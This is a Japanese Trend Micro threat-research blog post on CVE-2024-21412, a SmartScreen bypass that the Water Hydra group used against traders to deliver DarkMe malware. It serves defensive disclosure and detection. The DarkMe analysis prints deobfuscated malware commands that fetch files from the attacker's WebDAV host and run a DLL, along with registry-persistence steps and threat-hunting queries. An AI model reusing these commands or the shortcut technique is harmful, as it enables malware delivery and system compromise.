エクスプロイト&脆弱性
Windows Defender SmartScreenの脆弱性「CVE-2024-21412」、攻撃グループWater Hydraによる金融関連へのゼロデイ攻撃を確認
トレンドマイクロのゼロデイイニシアチブ(ZDI)は、脆弱性CVE-2024-21412を発見し、ZDI-CAN-23100として記録しました。この脆弱性は、金融市場のトレーダーを狙った高度で複雑なゼロデイ攻撃チェーンの一環として、Windows Defender SmartScreenを回避する手法に関連しています。
トレンドマイクロのゼロデイイニシアチブ(ZDI)は、脆弱性CVE-2024-21412を発見し、ZDI-CAN-23100として記録しました。この脆弱性は、金融市場のトレーダーを狙った高度で複雑なゼロデイ攻撃チェーンの一環として、Windows Defender SmartScreenを回避する手法に関連しています。この攻撃は、トレンドマイクロでWater Hydra(別名:DarkCasino)として追跡している標的型サイバー攻撃(APT)グループによって実行されました。
トレンドマイクロでは、2023年12月下旬から攻撃グループWater Hydraによる類似のツール、戦術、手順を含む攻撃キャンペーンの追跡を開始し、この攻撃活動には、インターネットショートカット(.URL)やWebベースの分散型作成・バージョン管理(WebDAV)コンポーネントの悪用が含まれていました。この攻撃チェーンでは、攻撃者がCVE-2024-21412を悪用することで、Microsoft Windows Defender SmartScreenを回避し、被害者のデバイスにマルウェアDarkMeを感染させることが可能となります。ZDIのバグ報奨金プログラムでは、Microsoft社と協力してこのゼロデイ攻撃を明らかにし、この脆弱性に対する迅速な修正を実施しました。また、トレンドマイクロは、CVE-2024-21412を悪用する攻撃者からユーザを保護するためのセキュリティソリューションを提供しています。これらの対策は本稿の最後に紹介されています。
なお、本脆弱性を悪用した攻撃手法や対策について解説するウェビナーをオンデマンドで配信していますので是非ご覧ください。
APT攻撃グループ「Water Hydra」について
APT攻撃グループWater Hydraは2021年に初めて確認され、銀行、仮想通貨プラットフォーム、外国為替取引および株式取引プラットフォーム、ギャンブルサイト、カジノなど、世界中の金融業界を標的にした攻撃で注目されました。
このグループによる攻撃は当初、フィッシングの手口やその他の戦術、技術、手順が類似していたため、APT攻撃グループ「Evilnum」の仕業と考えられていました。しかし、2022年9月、セキュリティ企業NSFOCUSのリサーチャーがヨーロッパのトレーダーやギャンブルプラットフォームを狙った攻撃キャンペーン「DarkCasino」の一部として、VisualBasicによるリモートアクセスツール(RAT)マルウェア「DarkMe」を発見しました。北米では、このローダー型マルウェアDarkMeの利用は限定的であることが確認されています。
2023年11月になると、株式トレーダーを狙った攻撃チェーンにおいて有名なWinRARコード実行脆弱性CVE-2023-38831を悪用した攻撃キャンペーンを含め、いくつかの攻撃キャンペーンが確認される中、Water HydraがEvilnumとは別の独立したAPT攻撃グループであることが明らかになりました。
Water Hydraの攻撃パターンからは、未公開のゼロデイ脆弱性を悪用するなど、高度な技術力と洗練性が伺えます。例えば、2023年4月、公開前の数ヶ月間にゼロデイであった脆弱性CVE-2023-38831を悪用し、仮想通貨トレーダーを標的にしていました。この脆弱性CVE-2023-38831は、公開された後、APT28(FROZENLAKE)、APT29(Cozy Bear)、APT40、Dark Pink、Ghostwriter、Konni、Sandwormなどの他のAPT攻撃グループによっても悪用されています。
Water Hydraによる攻撃チェーンとTTPについて
今回の調査では、APT攻撃グループWater Hydraが自身の攻撃チェーンを更新し、新たな攻撃活動への展開をテストしていることが確認されました。
2023年12月の攻撃チェーン
図1のとおり、初期の感染チェーンでは、脆弱性CVE-2024-21412を悪用していました。そして2024年1月下旬からWater Hydraは、より効率的な感染プロセスを採用しています。
2024年1月から2月にかけて更新された攻撃チェーン
2024年1月、Water Hydraは、脆弱性CVE-2024-21412を悪用した感染チェーンを改良することで、不正なMicrosoftインストーラーファイル(.MSI)の実行により、マルウェアDarkMeの感染プロセスを更に簡略化しています。
感染チェーンの分析
以下、攻撃キャンペーンWater Hydraが脆弱性CVE-2024-21412を悪用してMicrosoft Windows Defender SmartScreenを迂回し、ユーザにマルウェアDarkMeを感染させるプロセスを分析します。
初期侵入:外国為替フォーラムでのスピアフィッシング
攻撃チェーンの中で、Water Hydraは外国為替取引フォーラムや株式取引のTelegramチャンネルでスピアフィッシング攻撃キャンペーン(T1566.002)を実施しました。この攻撃キャンペーンでは、取引アドバイスを求めたり提供したりするメッセージを投稿するなど、さまざまなソーシャルエンジニアリングの手口を駆使してトレーダーをマルウェアDarkMeの感染に誘導しています。また、偽の株式情報や金融ツールを共有し、これらにはグラフ技術分析やグラフ指標ツールが含まれており、いずれもトロイの木馬型マルウェアに感染した株価チャートへのリンクが含まれていました。このリンクは、侵害されたロシアの取引・暗号資産情報サイト(fxbulls[.]ru)から提供されていました。
注目すべき点として、この侵害されたWordPressサイトは、実際の外国為替ブローカーであるfxbulls[.]comと同じ名称ですが、ロシアのドメイン(.ru)上に設置されています。
fxbulls[.]comのブローカーの方は、MetaTrader 4(MT4)取引プラットフォームを採用しています。このプラットフォームは、2022年9月にロシアに対する西側諸国の制裁によりApple App Storeから削除されましたが、Apple社は、2023年3月までにMT4ともう1つのMetaTraderバージョン(MT5)を復活させました。
外国為替取引フォーラムにおけるスピアフィッシング攻撃キャンペーンを分析する過程で、英語とロシア語によるWater Hydraの投稿が多数確認されました。これらの投稿は、多くの場合、取引チャートの技術分析に関する一般的な外国為替や株式取引の質問に対する返答として誘導させ、株価チャートへのリンクを含んでいました。
しかし誘導先は株価チャートではなく、侵害されたロシア語の外国為替、株式、暗号資産のニュースサイトに設置されたHTM/HTML形式のランディングページへリンクしていました。このランディングページはWordPressでホストされており、別の不正リンクも表示しています。こうした誘引は、JPEGファイルへのリンクに偽装され、WebDAV共有を示しています。実際、不正なfxbulls[.]ruサイトへのリンクを投稿していたアカウントの多くが数年経過していることからも、マルウェアDarkMeが攻撃キャンペーンで駆使され、取引フォーラムの正規のユーザーアカウントを侵害している可能性があります。
fxbulls[.]ruのランディングページには、特別に設計されたフィルター付きビューの不正なWebDAV共有へのリンクが存在しています。このリンクをクリックすると、ブラウザーはユーザにWindowsエクスプローラで開くよう促します。これはセキュリティに関する警告ではないため、ユーザはリンクが不正なものであると気づかない可能性があります。
初期侵入:search: プロトコルを利用してWindowsエクスプローラのウィンドウをカスタマイズ
この攻撃キャンペーンにおいて、Water Hydraは興味深い手法を用いて、被害者に不正なインターネットショートカット(.urlファイル)をクリックさせようとしています。この手法では、一般的なms-searchプロトコルとは異なる、Microsoft Windowsのsearch: アプリケーションプロトコルが悪用されています。search: プロトコルはWindows VistaからWindowsに組み込まれており、Windowsデスクトップ検索アプリケーションを起動します。感染チェーンにおいて、Water Hydraは、search: プロトコルと精巧に作られたAdvanced Query Syntax(AQS)クエリを組み合わせて、Windowsエクスプローラの表示をカスタマイズし、被害者を欺こうとします。
- アプリケーションプロトコルを用いて、「photo_2023-12-29.jpg」の検索を行う
- 「crumb」パラメータを使って検索範囲を悪意のあるWebDAV共有に限定する
- 「DisplayName」要素を利用してユーザに対し、これがローカルの「ダウンロード」フォルダであると誤認させる
図6に示されたリンクをクリックすると、被害者に対してどのようにWindowsエクスプローラが表示されるかが分かります(図7参照)。検索プロトコル、AQSクエリ、そしてDisplayName要素を駆使することで、Water Hydraの攻撃者は、ユーザにWebDAVサーバからファイルがダウンロードされたと思わせ、その結果、ユーザがこの不正なファイル(見た目はJPEG画像の偽物)をクリックするよう仕向けます。このエクスプローラのウィンドウは、photo_2023-12-29.jpg.urlという名称の不正な.urlファイルの巧みに作られた表示となっています。Microsoft Windowsは、.url拡張子を自動的に非表示にするため、ファイル名だけ見るとJPEG画像のファイルであるように見えます。
不正活動の実行:CVE-2024-21412(ZDI-CAN-23100)を悪用してWindows Defender SmartScreenの回避
脆弱性CVE-2024-21412は、インターネットショートカットに関連しています。これらの.urlファイルは単純なINI設定ファイルであり、「URL=」パラメータを使用してURLを指定します。.urlファイル形式は公式に文書化されていないものの、このファイルタイプの場合は、URLパラメータのみが必要となっています。
不正な.urlファイルを分析していた際、Water Hydraがimagress.dll(Windowsイメージリソース)アイコンライブラリを使用して、インターネットショートカットファイルのデフォルトアイコンをIconFile=およびIconIndex=パラメータを用いてイメージアイコンに変更してユーザを欺き、トロイの木馬型のインターネットショートカットに正当性を加える手法を用いていることが確認されました。こうして、JPEGに偽装されたインターネットショートカットをダブルクリックするだけで、Water Hydraの攻撃者は、脆弱性CVE-2024-21412を悪用してWindows Defender SmartScreenを回避し、Windowsホストを完全に侵害することが可能となります。
脆弱性CVE-2024-21412に悪用されるインターネットショートカットファイルの調査中、異常な点が確認されました。photo_2023-12-29.jpg.urlファイルのURL=パラメータが、四つ組のIPアドレス(IPv4)のサーバ上にホストされている別のインターネットショートカットファイルを指していました。
不正なWebDAV共有の分析を進める中で、2.urlインターネットショートカットを含め、Water Hydraに関連する全てのデータを収集することができました。この参照情報をたどった結果、2.urlが以前に修正されたWindows Defender SmartScreenのバイパス手法を悪用するロジックを含んでいることが明らかになりました。このバイパスは脆弱性CVE-2023-36025として識別されています。最近では、この脆弱性を狙った攻撃キャンペーンも調査していました。
インターネットのショートカットを別のショートカット内で参照することは、非常に珍しい行為です。このような異常な振る舞いに対応するため、さらなるテストと分析を目的とした概念実証(PoC)を作成しました。このPoCテスト期間中、ZDIは最初のショートカット(2番目のショートカットを参照)が脆弱性CVE-2023-36025に対する修正を回避し、SmartScreenの保護をすり抜けることを発見しました。こうしたPoC分析とテストを通じ、ショートカット内に別のショートカットを呼び出すだけでSmartScreenを回避できることが明らかになりました。この回避は、信頼できないソースからのファイルを開いたり実行したりする際にユーザに警告するWindowsの重要な機能であるMark-of-the-Web(MotW)が適切に機能しなかったために可能となりました。この分析後、トレンドマイクロからは、Microsoft MSRCに連絡し、実際に悪用されているSmartScreenのゼロデイ問題を警告し、概念実証のエクスプロイトとして提供しました。
Windows Explorerの表示を巧みに構築することにより、Water Hydraは、脆弱性CVE-2024-21412の脆弱性を突くためのリンクをユーザにクリックさせ、信頼できないソースからのコード実行を引き起こします。これは、WindowsがMotWを正確に適用できないことにより、SmartScreenの保護機能が働かない状況を利用しています。こうした感染プロセスはユーザが気づかずにバックグラウンドで進行します。
SmartScreenを回避すると、2番目の2.urlショートカットが攻撃者のWebDAV共有にあるZIPファイル内に組み込まれたバッチファイルを実行します。このバッチスクリプトは、不正なWebDAV共有からマルウェアDarkMeのダイナミックリンクライブラリ(DLL)ローダーをコピーして実行します。この一連の処理にユーザが気づかないうちにSmartScreenの保護機能を迂回して行われるのは、非常に問題があると言えます。何か異常が進行していることを示す明確な兆候は、ユーザにはほとんどもしくはまったく提供されません。
図12では、Sysinternalsのプロセスエクスプローラーが不正なバッチファイルが実行される様子を表示しています。このバッチファイルは、脆弱性CVE-2024-21412が悪用され、SmartScreenの保護を回避した直後に実行される最初のスクリプトです。
図13のスクリーンショットは、Water HydraのWebDAV共有に対して行われた多数のリクエストを示しています。WebDAVでは、サーバからXMLに保存されているプロパティを取得するために、「プロパティ検索(PROPFIND)」というリクエストが何度も使われています。
悪用と感染の過程が終了した後、攻撃者は、自身のC&C WebDAVサーバに接続し、脆弱性CVE-2024-21412の悪用に使われたトロイの木馬化されたJPEGと同じ名前を持つ実際のJPEGファイルをダウンロードします。このファイルは被害者に表示され、彼らがダウンロードフォルダから開こうとした元のJPEGファイルを開いたと錯覚させます(この時点でDarkMeの感染については一切知らされていません)。
「DarkMe Downloader」の解析
マルウェアDarkMeはVisual Basicで書かれたトロイの木馬型ダウンローダのDLLであり、攻撃者のWebDAVから次の段階のペイロードをダウンロードし実行する役割を持っています。このマルウェアは、cmd.exeコマンドインタープリタを通じて一連のコマンドを実行することで活動します。マルウェア内のコマンドは逆文字列技術を用いて難読化させています。コマンドを実行するには、まずStrings.StrReverseメソッドを利用して文字列の順序を元に戻し、その後にshellメソッドを通じてそれらを実行します。マルウェアは真の目的を隠し、リバースエンジニアリングを難しくするために無駄なコードで満たされている点に留意することも重要です。本稿では調査および理解を容易にするため、コードスニペットは全てこれらの難読化を解除して、わかりやすい形で提示しています。
以下の例は、マルウェアが上述の処理をどのように行うかを示しています。
難読化を解除したコマンドラインは以下の通りです。
cmd /c copy /b \84[.]32[.]189[.]74@80\fxbulls\pictures\7z[.]dll %TEMP%\7z[.]dll&&cmd /c copy /b \84[.]32[.]189[.]74@80\fxbulls\pictures\7z[.]exe %TEMP%\7z[.]exe&&cmd /c \84[.]32[.]189[.]74@80\fxbulls\pictures\photo_2023-12-29s[.]jpg&&cmd /c copy /b \84[.]32[.]189[.]74@80\fxbulls\pictures\My2[.]zip %TEMP%\My2[.]zip&&timeout 1&&cmd /c cd %TEMP%&&7z x "My2[.]zip" -password-1 -y&&timeout 1&&cmd /c rundll32 undersets[.]dll, RunDllEntryPointW&&timeout 1&&pause
以下の表は、実行されたコマンドとそれらが何をするかの説明を示しています。
スクリプトの最終段階において、マルウェアはrundll32を通じて、undersets.dllというDLLのRunDllEntryPointWエクスポート関数を実行します。
以下の画像は、My2.zipの中身を示しています。
「DarkMe Loader」の解析
このマルウェアは実行されると、二つのバイナリファイル(a1とa2)の内容を結合し、以下の新しいファイルにしてDarkMeペイロードを生成します。
C:\Users\admin\AppData\Roaming\OnlineProjects\OnlineProject.dll
バイナリ内に重要な文字列を直接表示させないため、マルウェアはこれらを16進数形式でエンコードします。そして、必要に応じて実行時にASCII形式にデコードします。
調査を容易にして可読性を高めるために、全ての不要なコードは削除され、16進数でエンコードされたデータはASCII形式に変換されています。
また、このマルウェアは、reg.exeユーティリティを使用して、kb.txtファイルからレジストリ設定をインポートするコマンドを生成して実行します。
"C:\Windows\System32\cmd.exe" /c cd C:\Users\admin\AppData\Roaming\OnlineProjects&&cmd /c timeout 1&&cmd /c reg.exe import kb.txt
これらの設定は、DarkMeペイロードのOnlineProject.dllをCOMサーバとして登録し、システムのレジストリにその設定を行うことに関連しています。
以下のスニペットは、kb.txtレジストリファイルの内容を示しています。
最後に、ペイロードを実行するために、このマルウェアは、登録されたCOMクラスを呼び出す以下のコマンドを実行します:
"C:\Windows\SysWOW64\rundll32.exe" /sta {74A94F46-4FC5-4426-857B-FCE9D9286279}
「DarkMe RAT」の解析
この攻撃の最終段階で配布されるのは、マルウェアDarkMeの中でもリモートアクセスツールもしくはトロイの木馬型と呼ばれるRATです。このマルウェアは、上述のローダ(Loader)やダウンローダ(Downloader)のモジュールと同様に、DLLファイル形式であり、Visual Basicで作成されています。ただし、この最終モジュールは、先行する2つのモジュールと比較して、より多くの難読化が施され、多くのジャンクコードが含まれています。このマルウェアはTCPを介した独自のプロトコルを使用して、制御サーバと通信を行います。
実行されると、このマルウェアは、感染端末からコンピュータ名、ユーザ名、インストールされているセキュリティソフト、アクティブなウィンドウのタイトルなどの情報を収集します。その後、攻撃者の制御サーバに自身を登録します。
このマルウェアは、ネットワーク通信を確立し、ソケットメッセージを処理するため、CreateWindowEx Windows APIを利用して、「SOCKET_WINDOW」という名前で、非表示のウィンドウを「STATIC」タイプで作成します。この非表示のウィンドウは、ウィンドウメッセージを介してソケットデータを中継し、サーバとの通信を支援します。
C&CサーバのドメインはRC4で暗号化され、「Text2022」という名前のVB.Formのテキストボックスに格納されています。さらにこのマルウェアは、「noway123!$$#@35@!」という予め設定されたキーを使って、暗号化されたドメインを復号します。
マルウェアは、コンピュータの名前、ユーザ名、インストールされているセキュリティソフト、アクティブなウィンドウのタイトルなどの情報を収集し、被害者のシステムをC&Cサーバに登録します。
以下は、このマルウェアが被害者の登録のために送信する初期ネットワークトラフィックの例です。
また、以下はDarkMeによって使用される初期のパケットの構造です。
C&Cサーバとの接続を確認するため、マルウェアは定期的にハートビートパケットを送信します。このタスクのために、このマルウェアは「5555ミリ秒」の間隔でTimer3と呼ばれる別のタイマーを設定します。図26はこのトラフィックの例を示しています(DarkMeのいくつかのバリアントは異なる値を送信します)。
このマルウェアは、被害者情報を登録した後、攻撃者からのコマンドを待ち受けるために、TCP接続のリスナーを初期化します。コマンドが届くと、そのコマンドを解析し、感染したシステムで実行します。また、このマルウェアは、多岐にわたる機能を支援しており、ディレクトリの内容を一覧表示(STRFLS、STRFL2)、シェルコマンドを実行(SHLEXE)、ディレクトリを作成または削除、システムドライブの情報を取得(300100)、指定されたパスからZIPファイルを作成(ZIPALO)などのコマンドが利用可能です。
結論
ゼロデイ脆弱性による攻撃は、ソフトウェアメーカーも知らない脆弱性を悪用し、対応するセキュリティ修正がないため、企業や組織にとって大きなセキュリティリスクとなります。Water HydraのようなAPTグループは、高度な攻撃キャンペーンにおいてゼロデイ脆弱性を見つけ出し、悪用するための専門知識とツールを駆使します。これらの攻撃グループは、DarkMeのような非常に破壊的なマルウェアを使用します。
過去の攻撃キャンペーンでは、Water Hydraが脆弱性CVE-2023-38831を悪用し、企業用組織が対策を講じる前の数ヶ月間、この脆弱性を使った攻撃を行っていました。この脆弱性が公になった後、他のAPTグループもCVE-2023-38831を悪用した攻撃キャンペーンに取り組み始めていました。ZDIは、ゼロデイ脆弱性の悪用に関していくつかの憂慮すべき傾向を指摘しています。まず、APT28(FROZENLAKE)、APT29(Cozy Bear)、APT40、Dark Pink、Ghostwriter、Konni、Sandwormなどの国家支援APTグループが、サイバー犯罪グループによって発見されたゼロデイ脆弱性を取り入れ、複雑な攻撃を仕掛けるケースが増えていることです。これにより、企業や組織へのリスクが一層高まっています。また、脆弱性CVE-2023-36025への対応をCVE-2024-21412の悪用によって簡単にバイパスできる事例は、セキュリティ修正に対する業界全体の問題点を浮き彫りにしています。これは、APTの攻撃者が修正済みのソフトウェアコンポーネントを迂回する新しい攻撃方法を容易に見つけ出せることを示しています。
トレンドマイクロのZDIは、セキュリティリサーチャーやベンダーと協力して、APTグループが攻撃に使用する前にソフトウェアの脆弱性を修正し、責任を持って公開することで、ソフトウェアをより安全にし、顧客をゼロデイ攻撃から守ります。また、ZDIのスレットハンティングチームは、業界を保護するために、自然界でのゼロデイ攻撃を積極的に探索しています。
企業や組織は、Trend Vision One™を利用することで、こうした攻撃から自己防衛することができます。このソリューションは、セキュリティチームが既知、未知、管理されている、そして管理されていないサイバー資産を含む、アタックサーフェスを継続的に特定することを可能にします。Vision Oneは、潜在的な攻撃の可能性と影響を考慮に入れながら、企業や組織が潜在的なリスクを優先順位付けして対処するのに役立ちます。また、予防、検出、対応の幅広い機能を提供し、高度なスレットリサーチ、スレットインテリジェンス、AIによるサポートを受けています。これにより、セキュリティの問題を検出、対応、修復するまでの時間を短縮することができます。Trend Vision Oneは、ゼロデイ攻撃を含む、企業や組織の全体的なセキュリティ体制とその効果を向上させることができます。
不確実な侵入、行動、動作等に直面した際には、企業や組織は、自らのシステムが既に侵害されているか、情報漏えいが発生していると見なし、影響を受けたデータおよびツールチェーンを直ちに隔離する措置を取るべきです。組織や企業はより広い視点を持ち迅速な対応を行うことで、セキュリティ侵害への対処と、侵害を免れたシステムの保護を実現することができます。Trend Micro Endpoint Security、Trend Micro Network Security、およびTrend Micro™ XDRでは、現代の高度な脅威状況の中で不正なコンテンツを検出、スキャン、ブロックを可能にする包括的なセキュリティソリューションです。
追記
脆弱性CVE-2024-21412とWater Hydraの調査を進める中で、このゼロデイをめぐるさらなる攻撃者の動きが追跡され始めました。特に注目すべきは、マルウェアDarkGateを運用する攻撃グループが、この脆弱性を感染経路に取り入れ始めたことです。CVE-2024-21412を悪用した攻撃者についての追加情報と分析は、今後のブログ記事で提供する予定です。トレンドマイクロのお客様は、ZDI-CAN-23100向けの仮想パッチにより、これらのさらなる攻撃キャンペーンからも保護されます。
トレンドマイクロの対策
以下の保護機能は、ゼロデイ脆弱性CVE-2024-21412(ZDI-CAN-23100)とマルウェアDarkMeのペイロードからトレンドの顧客を検出し保護するために提供されています。
Trend Vision One検出モデル
- Potential Exploitation of Microsoft SmartScreen Detected (ZDI-CAN-23100)
- Exploitation of Microsoft SmartScreen Detected (CVE-2024-21412)
- Suspicious Activities Over WebDav
Trend Vision One脅威ハンティングのクエリ
(productCode:sds OR productCode:pds OR productCode:xes OR productCode:sao) AND eventId:1 AND eventSubId:2 AND objectCmd:"rundll32.exe" AND objectCmd:/fxbulls/ AND ( objectCmd:.url OR objectCmd:.cmd)
(productCode:sds OR productCode:pds OR productCode:xes OR productCode:sao) AND eventId:1 AND eventSubId:2 AND objectCmd:"rundll32.exe" AND objectCmd:/underwall/ AND ( objectCmd:.url OR objectCmd:.cmd)
eventId:"100101" AND (request:"84.32.189.74" OR request:"87iavv.com")
eventId:3 AND (src:"84.32.189.74*" OR dst:"84.32.189.74*")
productCode:(pdi OR xns OR pds OR sds OR stp OR ptp OR xcs) AND (eventId:(100115 OR 100119) OR eventName:INTRUSION_DETECTION) AND (src:"84.32.189.74*" OR dst:"84.32.189.74*")
ネットワーク対策(Trend Cloud One - Network Security & TippingPoint Filters)
- 43700 - HTTP: Microsoft Windows Internet Shortcut SmartScreen Bypass Vulnerability
- 43701 - ZDI-CAN-23100: Zero Day Initiative Vulnerability (Microsoft Windows SmartScreen)
- 43266 - TCP: Backdoor.Win32.DarkMe.A Runtime Detection
エンドポイント対策(Trend Cloud One - Workload and Endpoint Security, Deep Security & Vulnerability Protection IPS Rules, Trend Vision One –Endpoint Security)
- 1011949 - Microsoft Windows Internet Shortcut SmartScreen Bypass Vulnerability (ZDI-CAN-23100)
- 1011950 - Microsoft Windows Internet Shortcut SmartScreen Bypass Vulnerability Over SMB (ZDI-CAN-23100)
- 1011119 - Disallow Download Of Restricted File Formats (ATT&CK T1105)
- 1004294 - Identified Microsoft Windows Shortcut File Over WebDav
- 1005269 - Identified Download Of DLL File Over WebDav (ATT&CK T1574.002)
- 1006014 - Identified Microsoft BAT And CMD Files Over WebDav
Trend Micro Apex One, ウイルスバスタービジネスセキュリティサービス(VBBSS)
- 1011949 - Microsoft Windows SmartScreen Security Feature Bypass Vulnerability (CVE-2024-21412)
- 1011950 - Microsoft Windows SmartScreen Security Feature Bypass Vulnerability Over SMB (CVE-2024-21412)
Deep Discovery Inspection (DDI)
- 4983: Micosoft Windows SmartScreen Exploit (ZDI-CAN-23100) - HTTP(Response)
各トレンドマイクロソリューションの対応の詳細についてはこちらをご確認ください。
侵入の痕跡(Indicators of Compromise、IoC)
侵入の痕跡(IoC)について、こちらで確認してください。
本脆弱性に関するFAQはこちら
参考記事:
CVE-2024-21412: Water Hydra Targets Traders with Microsoft Defender SmartScreen Zero-Day
By: Peter Girnus, Aliakbar Zahravi, Simon Zuckerbraun
翻訳:与那城 務(Core Technology Marketing, Trend Micro™ Research)